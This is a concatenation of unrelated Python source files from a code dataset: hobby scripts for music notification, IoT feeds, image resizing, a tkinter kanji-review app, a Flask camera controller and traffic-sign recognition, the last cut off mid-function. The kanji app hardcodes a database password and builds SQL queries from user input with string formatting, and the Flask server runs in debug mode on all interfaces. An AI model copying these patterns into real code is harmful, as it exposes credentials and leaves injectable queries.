img.resize((96, 96))\n img.save(out_path)\n return out_path\n except:\n return \"\"\n\n def get_file(self):\n return self.mpd.currentsong().get(\"file\")\n\n def get_fullfile(self):\n return os.path.join(self.music_dir, self.file)\n\n def get_title(self):\n return self.mpd.currentsong().get(\"title\")\n\n def update(self):\n self.title = self.get_title()\n self.album = self.get_album()\n self.artist = self.get_artist()\n self.file = self.get_file()\n self.cover = self.get_cover()\n\n def watch(self):\n old_file = self.file\n while True:\n # Wait until mpd status change\n self.mpd.idle()\n if self.get_state() == \"stop\":\n break\n\n self.update()\n\n # prevent multiple undesired notification\n if old_file != self.file:\n time.sleep(0.25)\n break\n\n\n\"\"\"\nmpd-notify - Notification wrapper for mpd\nCopyright (C) 2020 slapelachie\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nFind the full license in the root of this project\n\"\"\"","repo_name":"slapelachie/mpd-notify","sub_path":"mpd_notify/mpd.py","file_name":"mpd.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"16218042813","text":"\nfrom Adafruit_IO import RequestError, Client, Feed #Se importa la libreria de Adafruit\nfrom pylab import *\n\nADAFRUIT_IO_USERNAME = \"SammusDeVennus\"\n\n\nADAFRUIT_IO_KEY = \"xxxxxxxxxxxxxxxxxx\"\n\n\n\naio = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\ntry:\n test1 = aio.feeds(\"senoidal\")\n test2 = aio.feeds(\"cosenoidal\")\nexcept RequestError: #En caso de no existir el Feed se crean, en este caso se crearon dos feeds\n test_feed1 =Feed(name=\"senoidal\")\n test_feed1 =aio.create_feed(test_feed1)\n \n test_feed2 =Feed(name=\"cosenoidal\")\n test_feed2 =aio.create_feed(test_feed2)\n\n\ngrados=1\n\nwhile grados<=360:\n m=sin(grados)\n n=cos(grados)\n aio.send_data(test1.key, m)\n aio.send_data(test2.key, n)\n grados=grados+0.25\n time.sleep(5)\n \n \n \n","repo_name":"SammusDe/Prueba_IOT","sub_path":"Programacion_Python/señales.py","file_name":"señales.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"74244748551","text":"from __future__ import print_function\nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\n\nfrom PIL import Image\n\n\nif len(sys.argv) != 3:\n print('Please provide and as arguments..')\n sys.exit(1)\n\nraw_images_path = sys.argv[1]\ncropped_images_path = sys.argv[2]\n\nraw_images_paths = [f for f in listdir(raw_images_path) if isfile(join(raw_images_path, f))]\nfor image_path in raw_images_paths:\n print(image_path)\n with open(raw_images_path + image_path, 'r+b') as f:\n with Image.open(f) as image:\n image = image.resize((256, 256), Image.ANTIALIAS)\n image.save(cropped_images_path + image_path, image.format)\n #cover = resizeimage.resize_cover(image, [256, 256])\n #cover.save(cropped_images_path + image_path, image.format)\n","repo_name":"chandana44/sketch2cartoon","sub_path":"src/preprocess/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"22730470948","text":"import numpy as np\n\nfrom utils.transform_utils import invert_review_chance\n\n\ndef get_alpha():\n # Alpha for 1 and 2 standard-deviations\n alpha = [0.05, 0.32]\n return alpha\n\n\ndef get_alpha_index():\n # Arbitrarily chosen so that alpha = 0.32. cf. get_alpha()\n alpha_index_to_display = 1\n return alpha_index_to_display\n\n\ndef predict_with_mapie(model, X):\n alpha = get_alpha()\n alpha_index_to_display = get_alpha_index()\n\n try:\n ypred, ypis = model.predict(X, alpha=alpha)\n\n lower_bound = ypis[:, 0, alpha_index_to_display]\n upper_bound = ypis[:, 1, alpha_index_to_display]\n ystd = 0.5 * (upper_bound - lower_bound).ravel()\n\n except TypeError:\n try:\n ypred, ystd = model.predict(X, return_std=True)\n\n except TypeError:\n ypred = model.predict(X)\n ystd = 0\n\n return ypred, ystd\n\n\ndef get_prediction_bounds(ypred, ystd, required_to_be_positive=True):\n p_lower = ypred - ystd\n p_upper = ypred + ystd\n\n if required_to_be_positive:\n machine_epsilon = np.finfo(float).eps\n\n p_lower = max(machine_epsilon, p_lower)\n p_upper = max(machine_epsilon, p_upper)\n\n return p_lower, p_upper\n\n\ndef invert_prediction_bounds(X, p_lower, p_upper, inverse_func=None):\n if inverse_func is None:\n inverse_func = invert_review_chance\n\n inv_p_lower = inverse_func(X, p_lower)\n inv_p_upper = inverse_func(X, p_upper)\n\n p_lower = min(inv_p_lower, inv_p_upper)\n p_upper = max(inv_p_lower, inv_p_upper)\n\n return p_lower, p_upper\n","repo_name":"woctezuma/steam-reviews-to-sales","sub_path":"utils/mapie_utils.py","file_name":"mapie_utils.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"}
+{"seq_id":"29108296940","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport psycopg2\r\n\r\nWIDTH = 550\r\nHEIGHT = 350\r\n\r\nWIDTHAdd = 350\r\nHEIGHTAdd = 200\r\n\r\nclass MainWindow:\r\n\r\n def __init__(self, master):\r\n # Defining master configs\r\n self.master = master\r\n self.master.geometry(f\"{WIDTH}x{HEIGHT}\")\r\n self.master.maxsize(WIDTH, HEIGHT)\r\n self.master.iconbitmap(\"Images/icon.ico\")\r\n self.master.title(\"漢字復習\")\r\n self.master.config(bg=\"pink\")\r\n\r\n\r\n\r\n\r\n\r\n # Adding the canvas for the Title\r\n self.TitleCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.TitleCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for the Image\r\n self.ImageCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.ImageCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for the Buttons\r\n self.ButtonsCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.ButtonsCanvas.pack(expand = True, fill = \"both\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n # Adding the Title\r\n self.TitleLabel = tk.Label(self.TitleCanvas, text = \"Welcome to 漢字復習!\")\r\n self.TitleLabel.config(font = (\"Courier\", 20, \"bold\"), bg = \"pink\")\r\n self.TitleLabel.pack()\r\n\r\n\r\n # Adding the image to the master\r\n image = Image.open(\"Images/umaru.jpg\").resize((300,200), Image.ANTIALIAS)\r\n UmaruPath = ImageTk.PhotoImage(image)\r\n self.Umarulabel = tk.Label(self.ImageCanvas, image = UmaruPath)\r\n self.Umarulabel.image = UmaruPath\r\n self.Umarulabel.pack()\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n # Buttons ------------------------------------------------------------------------------------------------------------\r\n\r\n # Creating the Button that opens the Kanji List\r\n self.KanjiListPopButton = tk.Button(self.ButtonsCanvas, text = \"Show Kanji List\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.KanjiListPopButton.config(height = 2, width = 16 , bg = \"#F98FB4\")\r\n self.KanjiListPopButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Add to kanji List window\r\n self.AddKanjiButton = tk.Button(self.ButtonsCanvas, text = \"Add Kanji\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.AddKanjiButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.AddKanjiButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Remove from kanji list window\r\n self.RemoveKanjiButton = tk.Button(self.ButtonsCanvas, text = \"Remove Kanji\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.RemoveKanjiButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.RemoveKanjiButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Review window\r\n self.ReviewButton = tk.Button(self.ButtonsCanvas, text = \"Start Review\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.ReviewButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.ReviewButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n\r\n\r\n # Functions ------------------------------------------------------------------------------------------------------------\r\n\r\n # Creating the function that pops new windows\r\n def OpenNewWindow(self, windowClass):\r\n self.NewWindow = tk.Toplevel(self.master)\r\n 
windowClass(self.NewWindow)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass WindowOne:\r\n\r\n def __init__(self, master):\r\n # Defining master configs\r\n self.master = master\r\n self.master.geometry(f\"{WIDTHAdd}x{HEIGHTAdd}\")\r\n self.master.maxsize(WIDTHAdd, HEIGHTAdd)\r\n self.master.iconbitmap(\"Images/icon.ico\")\r\n self.master.title(\"漢字復習 - Adding new Kanji!\")\r\n self.master.config(bg=\"pink\")\r\n\r\n\r\n\r\n\r\n\r\n # Canvas ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding the canvas for Keyword\r\n self.KeywordCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.KeywordCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for Kanji\r\n self.KanjiCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.KanjiCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for Buttons\r\n self.ButtonsCanvas = tk.Canvas(self.master, height = 20, bg = \"pink\", highlightthickness=0)\r\n self.ButtonsCanvas.pack(expand = True, fill = \"y\") \r\n\r\n\r\n\r\n\r\n\r\n # Labels ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding the Label for Keyword\r\n self.KeywordLabel = tk.Label(self.KeywordCanvas, text = \"Type here your Keyword:\", bg = \"pink\", width = 25)\r\n self.KeywordLabel.pack(side = \"left\")\r\n\r\n # Adding the Label for Kanji\r\n self.KanjiLabel = tk.Label(self.KanjiCanvas, text = \"Enter here the respective kanji:\", bg = \"pink\", width = 25)\r\n self.KanjiLabel.pack(side = \"left\")\r\n\r\n\r\n\r\n\r\n # Entries ------------------------------------------------------------------------------------------------------------\r\n\r\n # Defining textvariables dor entry\r\n self.Keywordcontent = tk.StringVar()\r\n self.Kanjicontent = tk.StringVar()\r\n\r\n # Adding the Entry for Keyword\r\n self.KeywordEntry = tk.Entry(self.KeywordCanvas, width = 25, fg = \"#C71150\", textvariable = self.Keywordcontent)\r\n self.KeywordEntry.pack(side = \"left\")\r\n\r\n # Adding the Entry for Kanji\r\n self.KanjiEntry = tk.Entry(self.KanjiCanvas, width = 25, fg = \"#C71150\", textvariable = self.Kanjicontent)\r\n self.KanjiEntry.pack(side = \"left\")\r\n\r\n\r\n\r\n\r\n # Buttons ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding button to close window\r\n self.AddKanjiCloseButton = tk.Button(self.ButtonsCanvas, text = \"Go back\", width = 20, command = self.master.destroy)\r\n self.AddKanjiCloseButton.pack(side = \"left\", padx = 4)\r\n\r\n # Adding the button that effectivelly adds the Kanji\r\n self.AddButton = tk.Button(self.ButtonsCanvas, text = \"Add kanji\", width = 20, command = self.addKanji)\r\n self.AddButton.pack(side = \"left\", padx = 4)\r\n\r\n \r\n\r\n\r\n\r\n # Functions ------------------------------------------------------------------------------------------------------------\r\n\r\n # Defining the function that adds the new kanji and keyword to the list\r\n def addKanji(self):\r\n\r\n # Adressing any mistake befor connecting to the database and making changes\r\n if len(self.Keywordcontent.get()) == 0:\r\n self.empty_keyword()\r\n elif len(self.Kanjicontent.get()) == 0:\r\n self.empty_kanji()\r\n else:\r\n \r\n # Connecting to the database\r\n conn = psycopg2.connect(\r\n host = \"localhost\",\r\n 
database = \"review\",\r\n user = \"postgres\",\r\n password = \"35c4p3fromh3ll\",\r\n port = \"5432\"\r\n ) \r\n \r\n # Creating the cursor\r\n cur = conn.cursor()\r\n\r\n # Creating the table if it does not exist\r\n create_table = \"CREATE TABLE IF NOT EXISTS review (id SERIAL PRIMARY KEY, keyword VARCHAR(50) NOT NULL, kanji VARCHAR(30) NOT NULL)\"\r\n cur.execute(create_table)\r\n # Commiting the table creation\r\n conn.commit()\r\n \r\n\r\n # Getting the content from the keyword and kanji Entry input\r\n keyword_ = self.Keywordcontent.get().upper()\r\n kanji_ = self.Kanjicontent.get()\r\n\r\n # Creating the error exceptions after the database connection\r\n\r\n # Checking if the keyword or kanji is already in the database\r\n check_if_keyword_data_exists = \"SELECT * FROM review WHERE keyword = '{}'\"\r\n check_if_kanji_data_exists = \"SELECT * FROM review WHERE kanji = '{}'\"\r\n\r\n cur.execute(check_if_keyword_data_exists.format(keyword_))\r\n keyword_checker = cur.fetchall()\r\n cur.execute(check_if_kanji_data_exists.format(kanji_))\r\n kanji_checker = cur.fetchall()\r\n\r\n if len(keyword_checker) != 0:\r\n self.existing_keyword()\r\n cur.close()\r\n conn.close()\r\n elif len(kanji_checker) != 0:\r\n self.existing_kanji()\r\n cur.close()\r\n conn.close()\r\n else:\r\n\r\n \r\n # Adding the keyword and kanji to the table\r\n \r\n inserting_data = \"INSERT INTO review (keyword, kanji) VALUES (%s, %s)\"\r\n cur.execute(inserting_data,(keyword_,kanji_))\r\n print(\"The kanji and keyword has been added succesfully\")\r\n # Commiting the insertion\r\n conn.commit()\r\n\r\n cur.close()\r\n conn.close()\r\n\r\n\r\n\r\n\r\n# Errors and Messages ------------------------------------------------------------------------------------------------------------\r\n\r\n # Warning for empty keyword entry\r\n def empty_keyword(self):\r\n tk.messagebox.showwarning(title = \"Empty Keyword Entry\", message = \"Please enter a keyword\")\r\n\r\n\r\n # Warning for empty kanji entry\r\n def empty_kanji(self):\r\n tk.messagebox.showwarning(title = \"Empty Kanji Entry\", message = \"Please enter a kanji\")\r\n \r\n\r\n # Warning for already existant keyword in database\r\n def existing_keyword(self):\r\n tk.messagebox.showwarning(title = \"Existing Keyword\", message = \"This keyword is already in the database!\")\r\n\r\n \r\n # Warning for empty kanji entry\r\n def existing_kanji(self):\r\n tk.messagebox.showwarning(title = \"Existing Kanji\", message = \"This kanji is already in the database!\")\r\n\r\n\r\n\r\n \r\n\r\n# Running app ------------------------------------------------------------------------------------------------------------\r\n\r\nroot = tk.Tk()\r\napp = MainWindow(root)\r\nroot.mainloop()","repo_name":"HeiwaRyuu/Python-App-KanjiReview","sub_path":"ReviewApp/All Review Backups/GUI - ADDING FUNCTION WORKING (BACKUP).py","file_name":"GUI - ADDING FUNCTION WORKING (BACKUP).py","file_ext":"py","file_size_in_byte":10262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32457508439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom datetime import datetime\nimport os as os\nimport lambdafit\nimport imp\nimport pandas as pd\n\n#assumes that you have taken SQUID data using Shawn's code \n\ndef fit_squid_data(self, datafile, band):\n #assumes one band and one power\n \n all_raw_data=np.load(datafile)\n all_raw_data=all_raw_data.item()\n \n \n power = list(all_raw_data[band].keys())[0]\n \n #assume there is only one power\n raw_data=all_raw_data[band][power]\n \n #a definition \n def redchisq(ydata, ymod):\n chisq=np.sum((ydata-ymod)**2) \n return chisq \n \n #make your dataframe to store the fitted values\n d_squid = {'smurf_band':[],\n 'smurf_chan':[],\n 'chi2':[], \n 'I0':[],\n 'm':[],\n 'f2':[],\n 'p2p':[], \n 'lamb':[], \n 'phi0_file':[]}\n \n d_squid = pd.DataFrame(d_squid)\n \n \n #now fit each curve\n bias=all_raw_data['bias']\n \n for chan in raw_data['channels']:\n chf=raw_data['fvsfr'][np.where(raw_data['channels']==chan)[0][0]]\n chan_params = lambdafit.lambdafit(bias, chf*1000)\n \n #get chi sq\n fit_chf = lambdafit.f0ofI(bias, chan_params[0], chan_params[1], chan_params[2], chan_params[3], chan_params[4])\n chisq = redchisq(chf*1000, fit_chf)\n \n #assign variable to make writing to df easier\n I0,m,f2,p2p,lamb = chan_params\n d_squid = d_squid.append({'smurf_band': band, 'smurf_chan':chan, 'chi2':chisq, 'I0':I0, 'm':m, 'f2':f2, 'p2p':p2p, 'lamb':lamb, 'phi0_file':datafile}, ignore_index=True)\n \n #and return the dataframe with all the fitted paramters\n return d_squid","repo_name":"simonsobs/readout-script-dev","sub_path":"heather/output_squid_fits.py","file_name":"output_squid_fits.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"46720566217","text":"from setuptools import setup\n\ninstall_requires = [\n \"aiohttp>=3.6.0\",\n \"discord.py==1.3.3\",\n \"EsiPy==1.2.2\",\n \"dynaconf==2.2.3\",\n \"redis==3.5.3\",\n \"requests==2.24.0\",\n \"dhooks==1.1.3\",\n \"black==19.10b0\",\n \"loguru==0.5.1\",\n \"asgiref==3.2.10\",\n \"dataclasses-json==0.5.5\",\n]\n\nsetup(\n name=\"contract-appraisal-bot\",\n version=\"0.0.1\",\n packages=[\"\"],\n url=\"\",\n license=\"\",\n author=\"Ben Cole\",\n author_email=\"\",\n description=\"\",\n install_requires=install_requires,\n)\n","repo_name":"wengole/contract-appraisal-bot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"42488391905","text":"tabby_cat = \"\\tI'm tabbed in.\" #gives space on the string\npersian_cat = \"i'm split\\non a line\" # /n puts the string after it on the next line\nbackslash_cat = \"i'm \\\\ a \\\\ cat.\" # its just put slashes on the string\n\n\nfat_cat = '''\nI'll do a list:\n\\t* cat foo\n\\t* Fishies\n\\t* Catnip\\n\\t* Grass\n'''\nprint (tabby_cat)\nprint (persian_cat)\nprint (backslash_cat)\nprint (fat_cat)\n","repo_name":"andreas-panagi/LPTHW-Exercise","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"31082329143","text":"import argparse\nimport csv\nimport random\nimport os\n\n\ndef arguments_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', \"--prodacts\", type=int, required=True)\n parser.add_argument('-l', \"--low_value\", type=int, default = 1)\n parser.add_argument('-u', \"--upper_value\", type=int, default = 100)\n parser.add_argument('-f', \"--file_name\", required=True)\n parser.add_argument('-s', \"--start_number\", type=int, default = 1)\n parser.add_argument('-e', \"--end_number\", type=int, default = 1)\n return parser.parse_args()\n\n\ndef main():\n args = arguments_parser()\n path = \"{}_{}_{}_{}\".format(args.file_name, str(args.prodacts), str(args.low_value), str(args.upper_value))\n try:\n os.mkdir(path)\n\n except OSError:\n print (\"Creation of the directory %s failed\" % path)\n return\n\n for file_number in range(args.start_number, args.end_number + 1):\n csv_file = \"{}_{}_{}_{}#{}.csv\".format(args.file_name, str(args.prodacts), str(args.low_value), str(args.upper_value), str(file_number))\n csv_columns = ['pid','duration']\n threads = []\n for item_number in range(1, args.prodacts + 1):\n duration = random.randint(args.low_value, args.upper_value)\n threads.append({\"pid\": item_number, \"duration\": duration})\n\n try:\n with open(csv_file, 'w+') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for data in threads:\n writer.writerow(data)\n\n os.rename(csv_file, path + \"/\" + csv_file)\n except IOError:\n print(\"I/O error\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"danielifshitz/AI_project","sub_path":"problem_generator.py","file_name":"problem_generator.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32395267116","text":"from odoo import fields, models\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = \"account.move.line\"\n\n def _get_computed_account(self):\n ctx = self._context\n sales_team = False\n if ctx.get('team_id'):\n sales_team = self.env['crm.team'].browse(\n self._context.get('team_id') or self._context['team_id'])\n elif ctx.get('order'):\n sales_team = ctx['order'].team_id\n\n if sales_team and sales_team.name == 'GreenStalk Gardens store':\n bigcomm_sale_acc = self.env['account.account'].search([('code', '=', '4040')])\n return bigcomm_sale_acc\n elif sales_team and sales_team.name == 'Amazon':\n amazon_sale_acc = self.env['account.account'].search([('code', '=', '4030')])\n return amazon_sale_acc\n\n return super(AccountInvoiceLine, self)._get_computed_account()\n","repo_name":"Captivea-JDU/GreenStalk-Vertical-Gardens","sub_path":"ksc_separate_account/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"27211327866","text":"#!/usr/bin/env python\n\nimport pantilthat\nfrom sys import exit\nimport picamera\nimport threading\n\ntry:\n from flask import Flask, render_template\nexcept ImportError:\n exit(\"This script requires the flask module\\nInstall with: sudo pip install flask\")\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('gui.html')\n\n@app.route('/api//')\ndef api(direction, angle):\n if angle < 0 or angle > 180:\n return \"{'error':'out of range'}\"\n\n angle -= 90\n\n if direction == 'pan':\n pantilthat.pan(angle)\n return \"{{'pan':{}}}\".format(angle)\n\n elif direction == 'tilt':\n pantilthat.tilt(angle)\n return \"{{'tilt':{}}}\".format(angle)\n\n return \"{'error':'invalid direction'}\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=9595, debug=True)\n# camera = picamera.PiCamera()\n# camera.rotation = 180\n# camera.resolution = (640, 480)\n# camera.start_recording('my_video.h264')\n# camera.wait_recording(60)\n# camera.stop_recording()\n","repo_name":"SuperFunkyNinja/CameraStuff","sub_path":"pantiltweb.py","file_name":"pantiltweb.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"17058675965","text":"#!/usr/bin/python3\n#\n#./tsr-camera.py --model=resnet18_e34.onnx --input_blob=input_0 --output_blob=output_0 --labels=labels.txt --video=1\n#./tsr-camera.py --model=resnet18_e34.onnx --input_blob=input_0 --output_blob=output_0 --labels=labels.txt --video=1 --display=1\n# note: with --video=1, the frame rate drops by approx.10fps\n\n#\nimport jetson.inference\nimport jetson.utils\n#from jetcam.csi_camera import CSICamera\n#from jetcam.usb_camera import USBCamera\n#\nimport argparse\nimport sys\nfrom datetime import datetime\n#\nimport ctypes\nimport numpy as np\nimport cv2\nfrom skimage import exposure\n#\n# pip3 install pyserial\nimport serial\n#\nfrom tsrvideosave import TSRvideoSave\nfrom tsrframesave import TSRframeSave\n# parse the command line\nparser = argparse.ArgumentParser(description=\"Classify a live camera stream using an image recognition DNN.\", \n\t\t\t\t\t\t formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.imageNet.Usage())\n# args\nparser.add_argument(\"--network\", type=str, default=\"googlenet\", help=\"pre-trained model to load (see below for options)\")\nparser.add_argument(\"--camera\", type=str, default=\"0\", help=\"index of the MIPI CSI camera to use (e.g. CSI camera 0)\\nor for VL42 cameras, the /dev/video device to use.\\nby default, MIPI CSI camera 0 will be used.\")\nparser.add_argument(\"--width\", type=int, default=1280, help=\"desired width of camera stream (default is 1280 pixels)\")\nparser.add_argument(\"--height\", type=int, default=720, help=\"desired height of camera stream (default is 720 pixels)\")\nparser.add_argument(\"--display\", type=int, default=0, help=\"render stream to DISPLAY\")\nparser.add_argument(\"--video\", type=int, default=0, help=\"save stream to ./raw/ storage\")\nparser.add_argument(\"--file\", type=str, help=\"filename of the video to process\")\nparser.add_argument(\"--nolearn\", type=int, default=0, help=\"filename of the video to process\")\nparser.add_argument(\"--with_ui\", type=int, default=1, help=\"show everything on the display\")\n# parse args\ntry:\n\topt = parser.parse_known_args()[0]\nexcept:\n\tprint(\"\")\n\tparser.print_help()\n\tsys.exit(0)\n#\ntry:\n ser = None #serial.Serial ('/dev/ttyTHS1', 9600, timeout=1)\nexcept:\n print(\"\")\n print ('!serial port NOT accessible')\n ser = None\n #sys.exit(0)\n#\n#ensure directories are created for learning\n\n# open the serial port\nif ser is not None and ser.isOpen ():\n print (ser.name + ' is open...')\n #\n st = 'v'\n ser.write (st.encode ())\n st = 'rrrr'\n ser.write (st.encode ())\n# st = ' '\n# ser.write (st.encode ())\n#\ndef write_to_7seg (val):\n if ser is None:\n return\n #never access the serial twice for the same value\n if write_to_7seg._mval == val:\n return\n #\n write_to_7seg._mval = val\n if val == -1:\n st = ' '\n else:\n st = '{:4d}'.format (val)\n #\n ser.write (st.encode ())\nwrite_to_7seg._mval = -2\n#\n# don't store signs and frames\nnolearn = False\nif opt.nolearn == 1:\n nolearn = True\nif nolearn == False:\n # create directories\n print('check learning storage')\n import os\n if not os.path.exists('../raw'):\n print('creating {}'.format('../raw'))\n os.makedirs('../raw')\n os.makedirs('../raw/_unk')\n # create label dirs\n lines = [line.rstrip('\\n') for line in open('./labels.txt')]\n for dirs in lines:\n #print('creating dir for label {}'.format('../raw/' + dirs))\n if not os.path.exists('../raw/' + dirs):\n print('creating {}'.format('../raw/' + dirs))\n os.makedirs('../raw/' + dirs)\n 
#\n# save video stream from camera\nsave_video = False\nif opt.video == 1:\n save_video = True\n#use video file?\nvideo_file = False\nif opt.file is not None:\n video_file = True\n print(\"using video file from {:s}\".format(opt.file))\n save_video = False\n# use CSI/USB camera or gstCamera\ncsi_camera = True\n# show frame from camera on display\nshow_display = False\nif opt.display == 1:\n show_display = True\n#--with-ui\nshow_ui = True\nif opt.with_ui == 0:\n show_ui = False\n# use ESC key to end the task\nESC = 27\nshow_fps = True\n#\nlFps_sec = 0 #current second\nlFps_c = 0 #current fps\nlFps_k = 0 #current frames\nlFps_M = 0 #max fps\nlFps_T = 0 #tot\nlFps_rS = 0 #running seconds\ncFk = 0 #frame count\n#\ncs_sec = 0\ncs_spd = 0\n# red circle radius\nc_r_min = 8#8-720p #5 #10\nc_r_max = 40#40-720p #25 #50\n\n#this is red\nlower_col1 = np.array ([0, 50, 50])\nupper_col1 = np.array ([10, 255, 255])\n#\nlower_col2 = np.array ([170, 50, 50])\nupper_col2 = np.array ([180, 255, 255])\n#\nkFot = 0 #count of saved frames\n##\n# load speed limit signs\nsign_white = cv2.imread('./ref/all-speeds-white.jpg')\nsign_black = cv2.imread('./ref/all-speeds-black.jpg')\n#\ndef extract_sign(speed, dark):\n # all signs is: 1000x600px\n # idx = row * W + col; row = (idx - col) / W\n sidx = speed // 10 - 1\n scol = sidx % 5\n srow = (sidx - scol) // 5\n #print ('sign index %d, %d' % (srow, scol))\n if dark == True:\n return sign_black[srow*200:srow*200+200, scol*200:scol*200+200]\n return sign_white[srow*200:srow*200+200, scol*200:scol*200+200]\n#POV definition\n# source 1280x720\n# of interest povs\n# xx >= 640 - right half\n# yy <= 360 - top half\n# xx: 320..640..960\n# yy: 180..360..540\n### for right side classification of traffic posts\n\"\"\"\n#c_xx = (640 + 160) # horizontal mid-point\nc_xx = (640 + 160 + 90) # horizontal mid-point\n#c_yy = 360 #c_ry # vertical mid-point\nc_yy = (360) #c_ry # vertical mid-point\n#c_rx = int (360 / 2) # horizontal width (half): x-rx, x+rx\nc_rx = int (240 / 2) # horizontal width (half): x-rx, x+rx\n#c_ry = int (360 / 2) # vertical width (half): y-ry, y+ry\nc_ry = int ((360-90) / 2) # vertical width (half): y-ry, y+ry\n\"\"\"\n## use percentage values: 0.0..1.0 - 0..100%\nctrx = 0.5 # POV horizontal center %: left to right\nctry = 0.4 # POV vertical center %: top to bottom\nsizx = 0.5 # POV width %\nsizy = 0.25 # POV heigth %\n#sizy = 0.2\n### for mid side/overhead classification of traffic signs\n#c_xx = (640 + 160) # horizontal mid-point\nc_xx = int(opt.width * ctrx) # horizontal mid-point\n#c_yy = 360 #c_ry # vertical mid-point\nc_yy = int(opt.height * ctry) #c_ry # vertical mid-point\n#c_rx = int (360 / 2) # horizontal width (half): x-rx, x+rx\nc_rx = int(opt.width * sizx / 2) # horizontal width (half): x-rx, x+rx\n#c_ry = int (360 / 2) # vertical width (half): y-ry, y+ry\nc_ry = int(opt.height * sizy / 2) # vertical width (half): y-ry, y+ry\n#\ndef store_image(img, desc, kts, kout, confi, sp):\n #global c_xx, c_yy, c_rx, c_ry\n #print(\"sign at: {:d}x{:d}r{:d}\".format(int(sp[0]+c_xx - c_rx), int(sp[1]+c_yy - c_ry), int(sp[2])))\n #\n if nolearn == True:\n return\n if img is None:\n return\n iname = None\n if confi == 0:\n if desc is None:\n # store frame - confi = 0\n iname = \"./raw/_unk/img-{}_{}-frame.jpg\".format (kts, kout)\n else:\n # store frame - confi = 0\n iname = \"./raw/{}/img-{}_{}-frame.jpg\".format (desc, kts, kout)\n else:\n if desc is None:\n # save sign for classification training\n iname = \"./raw/_unk/img-{}_{}-ori-c{}.jpg\".format (kts, kout, 
